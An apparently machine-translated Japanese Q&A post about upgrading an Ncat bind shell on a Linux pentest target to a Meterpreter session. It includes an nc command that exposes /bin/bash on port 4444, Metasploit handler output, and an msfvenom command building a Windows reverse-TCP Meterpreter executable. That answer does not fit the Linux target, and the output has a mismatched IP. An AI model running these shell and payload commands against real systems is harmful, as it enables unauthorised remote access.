侵入テスト中に、被害者のシステム(linux)でNcatバインドシェルを開くことができます。これにより、次に接続できるポートが開きます。
nc -l -v -k -e /bin/bash -p 4444
このncatシェルをmeterpreterセッションにアップグレードしたいと思います。この問題に対処するRapid7コミュニティフォーラムでこの投稿を見つけました。
https://community.rapid7.com/thread/4508#comment-12539
与えられた答えは次のとおりです:
Netcatは完全に独立した実行可能ファイルであり、フレームワーク内からmeterpreterにアップグレードできません。コマンドラインからユーザーアカウントを追加し、psexecを使用してmeterpreterバイナリをアップロードして実行できます。
基本的に、metasploitは常に最初にステージャーを送信してから、meterpreterバイナリ全体をダウンロードしますが、ncatシェルと直接やり取りすることはできません。この投稿では、ncatシェルを介して完全なmeterpreterバイナリをアップロードして実行することをお勧めしています。しかし、フレームワーク内でそのようなスタンドアロンバイナリを見つけることができませんでした。
PS:ncatシェルをアップグレードしようとしたときのmetasploitフレームワークからのデバッグ出力は次のとおりです。
msf > use multi/handler
msf exploit(handler) > set payload linux/x64/Shell/bind_tcp
payload => linux/x64/Shell/bind_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set RHOST 192.168.0.101
RHOST => 192.168.0.3
msf exploit(handler) > run
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (38 bytes) to 192.168.0.101
[*] Command Shell session 1 opened (192.168.0.17:33097 -> 192.168.0.101:4444) at 2017-06-05 10:23:35 +0200
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/Shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[-] Shells on the target platform, linux, cannot be upgraded to Meterpreter at this time.
あなたはmsfvenomでそのようなexeを生成することができます。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe
それでおしまい。